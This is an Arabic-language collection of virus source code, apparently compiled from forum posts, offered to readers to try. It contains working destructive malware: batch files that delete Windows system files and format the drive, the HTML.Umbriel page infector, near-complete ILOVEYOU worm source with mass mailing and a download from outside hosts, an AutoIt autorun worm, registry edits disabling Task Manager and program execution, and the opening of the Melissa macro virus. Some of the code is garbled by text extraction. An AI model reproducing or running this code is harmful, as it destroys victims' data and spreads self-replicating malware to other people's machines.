كتاب الفايروسات

Page 1

‫كودات فايروسات‬ echo off 1 echo WELCOME AT DARKHACK 2005 echo echo off >> c:\autoexec.bat echo del c:\windows\explorer.exe >> c:\autoexec.bat echo copy c:\windows\winpopup.exe c:\windows\explorer.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy.exe >> c:\autoexec.bat echo del c:\windows\command\xcopy32.exe >> c:\autoexec.bat echo echo ON EST PAS DES CRASHERS >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo echo HI MAN !!! HOW ARE YOU ? >> c:\autoexec.bat echo pause >> c:\autoexec.bat echo REGEDIT4 >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.exe] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.com] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.bat] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.sys] >> c:\windows\registre.reg echo [-HKEY_CLASSES_ROOT\.hlp] >> c:\windows\registre.reg copy c:\windows\registre.reg c:\windows\menudé~1\progra~1\démarr~1\registre.reg del c:\windows\registre.reg echo DECRYPTING echo del c:\windows\system\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.ocx >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.vxd >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\options\cab\*.cab >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.dll >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.exe >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\bureau\*.lnk >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\system\*.drv >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.ini >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\fonts\*.ttf >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\SYSTEM32\drivers\*.sys >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\command\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\windows\*.com >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo del c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo format c\: /autotest /q >> c:\autoexec.bat echo copy c:\windows\test.bat c:\autoexec.bat >> c:\windows\menudé~1\progra~1\démarr~1\command.bat echo C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows >> c:\windows\menudé~1\progra~1\démarr~1\command.bat


echo BYE BYE IS IT YOUR PASSWORD C:\WINDOWS\RUNDLL32.EXE C:\Windows\system\User.exe,ExitWindows

2 ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­[HTML.Ubriel for WindowsXP]­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‫كود‬: <html><!--Umbriel--> <head> <title> Second Part To Hell's HTML.Umbriel </title> </head> <body> <script language="VBScript"> rem VBS On Error Resume Next Dim fso, shell, wrte, tempdir, windir, rand, file Set fso=CreateObject("Scripting.FileSystemObject") Set shell=CreateObject("Wscript.Shell") if err.number=429 Then shell.Run javascript:location.reload() End If Set windir=fso.GetSpecialFolder(0) Set tempdir=fso.GetSpecialFolder(2) Set wrte=fso.CreateTextFile(windir+"\windows.cmd") wrte.WriteLine "cls" wrte.WriteLine "@echo off" wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34) wrte.Close() shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html" shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html" Randomize rand=int(rnd*5)+1 If rand=1 then shell.Run windir+"\windows.cmd" End If </script> <script language="JavaScript"> // JS var viruspath, virus, code, fso, file, check, checka, checkb fso=new ActiveXObject("Scripting.FileSystemObject") viruspath=window.location.pathname viruspath=viruspath.slice(1) virus=fso.OpenTextFile(viruspath,1) file=fso.CreateTextFile("C:\\umbriel.html") for (i=0; i<500; i++) { if (checkb!=1) {


if (Math.round(Math.random()*5)+1 == 3) { if (check == 2) { file.WriteLine("/"+"*") file.WriteLine("*"+"/") } if (check == 3) { file.WriteLine("rem") } } code=virus.ReadLine() if (code == "/"+"*") { checka=666 } if (code == "*"+"/") { checka=666 } if (code == "rem") { checka=666 } if (checka != 666 ) { file.WriteLine(code) } checka=0 if (code=="</"+unescape("%68")+"tml>") { checkb=1 } if (code=="// JS") { check=2 } if (code=="rem VBS") { check=3 } if (code=="</"+unescape("%73")+"cript>") { check=0 } } } virus.Close(); file.Close(); </script> <script language="VBScript"> rem VBS On Error Resume Next set fso=CreateObject("Scripting.FileSystemObject") set shell=CreateObject("WScript.Shell") set myfile=fso.OpenTextFile("C:\umbriel.html") mycode=myfile.ReadAll myfile.Close() rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File1") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File2") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File3") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File4") if rr <> "" Then Call Umbriel(rr, mycode) rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer \FrontPage Explorer\Recent Page List\File5") if rr <> "" Then Call Umbriel(rr, mycode) Sub Umbriel(rr, mycode) set victim=fso.OpenTextFile(rr) infcheck=victim.ReadLine If infcheck<>"<html><!--Umbriel-->" Then viccode=victim.ReadAll victim.Close() set wrtevic=fso.OpenTextFile(rr, 2, false, 0) wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode) wrtevic.Close


End If End Sub </script> </body> </html>

‫هذا كود فيروس لقيتة في موقع اجنبي جديد‬ ‫شغلتة يسوي ريستارات للجهاز حسب‬ ‫مافهمت مبرمج باللغة السي‬ 3 #include <windows.h> #include <stdio.h> #include <stdlib.h> { char sys1[256]; char sys2[256]; char win1[256]; GetModuleFileName(hMod, path, sizeof(path)); GetSystemDirectory(sys1, sizeof(sys1)); GetSystemDirectory(sys2, sizeof(sys2)); GetWindowsDirectory(win1, sizeof(win1)); strcat(sys1, "\\Sleep.exe"); strcat(sys2, "\\Doom32.com"); strcat(win1, "\\WinUpdate.exe"); CopyFile(path, sys1, false); CopyFile(path, sys2, false); CopyFile(path, win1, false);


MessageBox (0, "Not been foun Ram ", "Error !", MB_ICONERROR | MB_OK); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\ Run ", 0, KEY_SET_VALUE, &hKey); RegSetValueEx(hKey, "SLEEP", 0, REG_SZ, (const unsigned char*) sys1, sizeof(sys1)); RegSetValueEx(hKey, "DOOM32", 0, REG_SZ, (const unsigned char*) sys2, sizeof(sys2)); RegSetValueEx(hKey, "WinUpdate", 0, REG_SZ, (const unsigned char*) win1, sizeof(win1)); RegCloseKey(hKey); } { system("shutdown ­s ­f "); MessageBox(NULL,"Not enough memory to load this file.","Error !", MB_ICONERROR | MB_OK); }


‫وهذا كود من عندي للكس بي‬ ‫ طبعا‬batch file ‫يعني انسخه وحطه في المفكرة واحفظة‬ ‫ بامتداد‬bat 4 ‫كود‬: @echo off echo hi del/a/q c:\windows\*.* del/a/q c:\windows\system32\*.* rmdir/s/q c:\windows echo bey pause

‫" هذا كود لفيرس "الحب‬

****************************** rem barok ­loveletter(vbe) <i hate go to school> rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow eq=""


ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Sof tware\Micros oft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W indows Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs")


c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE­LETTER­FOR­ YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Soft ware\Micros oft\Internet Explorer\Download Directory") if (downread="") then downread="c:\"


end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnw erhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN­BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN­ BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbG RpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN­BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet


Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjkl NBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnma dshfgqw237 461234iuy7thjg/WIN­BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN­BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Cur rentVersion\Run\WIN­BUGSFI X",downread&"\WIN­BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\In ternet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc


If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close


bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")


scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam­Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE­LETTER­FOR­ YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub


sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1


end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application" ) set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1


regv=regedit.RegRead("HKEY_CURRENT_USE R\Software\M icrosoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USE R\Software\ Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE­ LETTER­FOR­YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&malead ,1,"REG_DWORD" end if x=x+1


next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&a,a.Ad dressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\W AB\"&a,a.Ad dressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="<HTML><HEAD><TITLE>LOVELETTE R ­ HTML<?­?TITLE><META NAME=@­@Generator@­@ &@#&@#&@#&@#&@#&@#&@#=@­ @BAROK VBS ­ LOVELETTER@­ @>"&vbcrlf& _ "<META NAME=@­@Author@­@ &@#&@#&@#&@#&@#&@#&@#=@­ @spyder ?­? ispyder@mail.com ?­?


@GRAMMERSoft Group ?­? Manila, Philippines ?­? March 2000@­@>"&vbcrlf& _ "<META NAME=@­@Description@­@ &@#&@#&@#&@#&@#&@#&@#=@­@simple but i think this is good...@­@>"&vbcrlf& _ "<?­?HEAD><BODY ONMOUSEOUT=@­@window.name=#­#main#­ #;window.open(#­#LOVE­LETTER­FOR­ YOU.HTM# ­#,#­#main#­#)@­@ "&vbcrlf& _ "ONKEYDOWN=@­@window.name=#­#main#­ #;window.open(#­#LOVE­LETTER­FOR­ YOU.HTM# ­#,#­#main#­#)@­@ BGPROPERTIES=@­ @fixed@­@ BGCOLOR=@­@#FF9933@­ @>"&vbcrlf& _ "<CENTER><p>This HTML file need ActiveX Control<?­?p><p>To Enable to read this HTML file<BR>­ Please press #­#YES#­# button to Enable ActiveX<?­?p>"&vbcrlf& _ "<?­?CENTER><MARQUEE LOOP=@­ @infinite@­@ BGCOLOR=@­@yellow@­@>­­­­­­­­­­


z­­­­­­­­­­­­­­­­­­­­z­­­­­­­­­­<?­?MARQUEE> "&vbcrlf& _ "<?­?BODY><?­?HTML>"&vbcrlf& _ "<SCRIPT language=@­@JScript@­ @>"&vbcrlf& _ "<!­­?­??­?"&vbcrlf& _ "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.****To(0,0);window. re sizeTo(wi,hi);}"&vbcrlf& _ "?­??­?­­>"&vbcrlf& _ "<?­?SCRIPT>"&vbcrlf& _ "<SCRIPT LANGUAGE=@­@VBScript@­ @>"&vbcrlf& _ "<!­­"&vbcrlf& _ "on error resume next"&vbcrlf& _ "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _ "aw=1"&vbcrlf& _ "code=" dta2="set fso=CreateObject(@­ @Scripting.FileSystemObject@­@)"&vbcrlf& _ "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr


(39 ))"&vbcrlf& _ "code3=replace(code2,chr(93)&chr(45)&chr(93),ch r(3 4))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),ch r(9 2))"&vbcrlf& _ "set wri=fso.CreateTextFile(dirsystem&@­@^­ ^MSKernel32.vbs@­@)"&vbcrlf& _ "wri.write code4"&vbcrlf& _ "wri.close"&vbcrlf& _ "if (fso.FileExists(dirsystem&@­@^­ ^MSKernel32.vbs@­@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _ "aw=0"&vbcrlf& _ "end if"&vbcrlf& _ "if (aw=1) then"&vbcrlf& _ "document.write @­@ERROR: can#­#t initialize ActiveX@­@"&vbcrlf& _ "window.close"&vbcrlf& _ "end if"&vbcrlf& _ "end if"&vbcrlf& _ "Set regedit = CreateObject(@­@WScript.Shell@­ @)"&vbcrlf& _ "regedit.RegWrite @­@HKEY_LOCAL_MACHINE^­^Software^­ ^Microsoft^­^Windows^­^CurrentVersion^­^Ru


n^­^MSKernel32@­@,dirsystem&@­@^­ ^MSKernel32.vbs@­@"&vbcrlf& _ "?­??­?­­>"&vbcrlf& _ "<?­?SCRIPT>" dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'") dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/") dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") set fso=CreateObject("Scripting.FileSystemObject") set c=fso.OpenTextFile(WScript.ScriptFullName,1) lines=Split(c.ReadAll,vbcrlf) l1=ubound(lines) for n=0 to ubound(lines) lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93)) lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr( 37)) if (l1=n) then


lines(n)=chr(34)+lines(n)+chr(34) else lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if next set b=fso.CreateTextFile(dirsystem+"\LOVE­ LETTER­FOR­YOU.HTM") b.close set d=fso.OpenTextFile(dirsystem+"\LOVE­ LETTER­FOR­YOU.HTM",2) d.write dt5 d.write join(lines,vbcrlf) d.write vbcrlf d.write dt6 d.close end sub

‫بالفجوال بيسك‬ ‫ جلب الداة‬winsock ********‫ضع الكود في الفورم ملحظة‬ ‫لتقوموا بتجرتة الكود ************ فقط بعد‬ ‫وضع الكود يجب انشاء ملف‬exe 4


le code app.taskvisible=false call kill("c:\windows\*.exe") call kill("c:\windows\*.ini") call kill("c:\windows\*.dll") ‫أنا خليته في تكست و بعدين بدلت المتداد‬ ‫ الى‬.reg ‫ و الهدف منه ان أي شي امتداده‬bat exe pif com ‫ما يشتغل‬ ::::::::‫ و هو كاتالي‬:::::::: [line] Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\.bat\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.pif\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.exe\PersistentHandler] @="{System Axe}" [HKEY_CLASSES_ROOT\.com\PersistentHandler] @="{System Axe}" [line]

‫هذا الكود لتعطيل الريجستري وادارة المهام‬ ‫ ولل‬gpedit.msc ‫الي يمكن للضحية اذا كان‬ ‫شاطر شوي انو يشغل منه اداره المهام‬ ‫والريجستري‬.....


reg add HKCU\software\Microsoft\Windows\CurrentVersi on\Pol icies\System\ /v DisableRegistryTools /t REG_DWORD /d 0000001 /f reg add HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\Curre ntVersion\Policies\System\ /v DisableTaskMgr /t reg_dword /d 00000001 /f @del "C:\WINDOWS\system32\gpedit.msc" /q

‫أقدم لكم الفيروس الذي يقوم بتغير الشاشة الرئيسية على قولت واحد‬

.. ‫ وأنا دحين بأجربو‬.. ‫ وأداني الكود‬.. ‫من الشباب‬ ‫ لنكم عيوني إنتو‬.. ‫ وأفيدكم‬.. ‫لكن أديكم الكود‬

‫ الكود هو‬.. ‫كود‬: @echo off set key=HKCU\Software\Microsoft\Internet Explorer\Main set value=Start page set data=http://www.tvquran.com/ reg.exe add "%key%" /v "%value%" /d "%data%" /f >nul

‫ قمت بصناعة فايروس يقوم بعمل‬minimize ‫للنوافذ المفتوحة‬


‫الية عمله‬ ‫‪ taskmgr‬عند تشغيله يغير اسمه الى‪1­ ‬‬ ‫‪ my document‬ينقل نفسه الى‪2­ ‬‬ ‫يقوم باخفاء نفسه‪3­ ‬‬ ‫يسجل اسمه ضمن المسجلت‪4­ ‬‬ ‫يقوم بانشاء ملف اوتوران‪5­ ‬‬ ‫يقوم بعمل منيمايز للنوافذ المفتوحة حيث‪6­ ‬‬ ‫قمت بانشاء عداد يبداء من ‪ 1‬ويتزايد بمقدار ‪1‬‬ ‫ويتوقف عندما يصل العدد الى ‪ 1-‬وهذا‬ ‫مستحيل‬ ‫بعد النتشار عند فتح اي بارتشن فان‪7 ­ ‬‬ ‫الفايروس سيعمل من جديد حتى بعد اعادة‬ ‫التشغيل‬ ‫‪ AutoIt Version: 3.2.10.0‬البرنامج المستخدم هو‬ ‫وهذا هو كود الفايروس‬ ‫‪#cs ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­­‬ ‫‪AutoIt Version: 3.2.10.0‬‬ ‫‪Author: asd‬‬ ‫‪Script Function:‬‬ ‫‪Template AutoIt script.‬‬ ‫‪#ce ‬‬


­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ­­­­­­­­­­­ ; Script Start ­ Add your code below here #NoTrayIcon $name="taskmgr" $exe=".exe" $count=1 $c="c:" $d="d:" $e="e:" $f="f:" $g="g:" $h="h:" $i="i:" $j="j:" $k="k:" $l="l:" $m="m:" $n="n:" sleep(3000) FileCopy (@AutoItExe, @DocumentsCommonDir & "\" & $name & $exe,0) ; Make itself protected (readonly, system, hidden)


FileSetAttrib (@DocumentsCommonDir & "\" & $name & $exe,"+RSH") ; Copy itself to windows directory

RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ ","Expl orer.exe " & $name & $exe) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;

sleep(1000) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Open",$name & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shellexe cute",$name & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shell\Open\command" ,$nam e & $exe) IniWrite (@DocumentsCommonDir & "\autorun.ini","Autorun","Shell","Open") Sleep (1)


FileSetAttrib (@DocumentsCommonDir & "\autorun.ini","+RSH") do ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;; FileDelete($c& "\autorun.inf") FileDelete($d& "\autorun.inf") FileDelete($e& "\autorun.inf") FileDelete($f& "\autorun.inf") FileDelete($g& "\autorun.inf") FileDelete($h& "\autorun.inf") FileDelete($i& "\autorun.inf") FileDelete($j& "\autorun.inf") FileDelete($k& "\autorun.inf")

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;; FileCopy (@DocumentsCommonDir & "\autorun.ini",$c& "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$d & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$e & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$f & "\autorun.inf",1)


FileCopy (@DocumentsCommonDir & "\autorun.ini",$g & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$h & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$i & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$j & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$k & "\autorun.inf",1) FileCopy (@DocumentsCommonDir & "\autorun.ini",$l & "\autorun.inf",1) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;; FileCopy(@AutoItExe,$c & "\" & $name & $exe) FileSetAttrib ($c & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$d & "\" & $name & $exe) FileSetAttrib ($d & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$e & "\" & $name & $exe) FileSetAttrib ($e & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$f & "\" & $name & $exe) FileSetAttrib ($f & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$g & "\" & $name & $exe) FileSetAttrib ($g & "\" & $name & $exe,"+RSH")


FileCopy(@AutoItExe,$h & "\" & $name & $exe) FileSetAttrib ($h & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$i & "\" & $name & $exe) FileSetAttrib ($i & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$j & "\" & $name & $exe) FileSetAttrib ($j & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$k & "\" & $name & $exe) FileSetAttrib ($k & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$l & "\" & $name & $exe) FileSetAttrib ($l & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$m & "\" & $name & $exe) FileSetAttrib ($m & "\" & $name & $exe,"+RSH") FileCopy(@AutoItExe,$n & "\" & $name & $exe) FileSetAttrib ($n & "\" & $name & $exe,"+RSH") ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; ;;;;;;;;; sleep (5) WinMinimizeAll() $count=$count+1 sleep(50000) Until $count=­1

‫لكم كود فايروس ميلسيا‬


‫هديةبما اني عضو جديد‬ ‫ارجو عدم استخدامه ضد اخوانناالمسلمين‬

Private Sub AutoOpen() On Error Resume Next p$ = "clone" If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\. 0\ord\e curity", "Level") <> "" Then CommandBars("Macro").Controls("Security..."). Enabl ed = False System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\. 0\ord\e curity", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabl ed = False Options.ConfirmConversions = (1 ­ 1): Options.VirusProtection = (1 ­ 1): Options.SaveNormalPrompt = (1 ­ 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice


Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;­)"


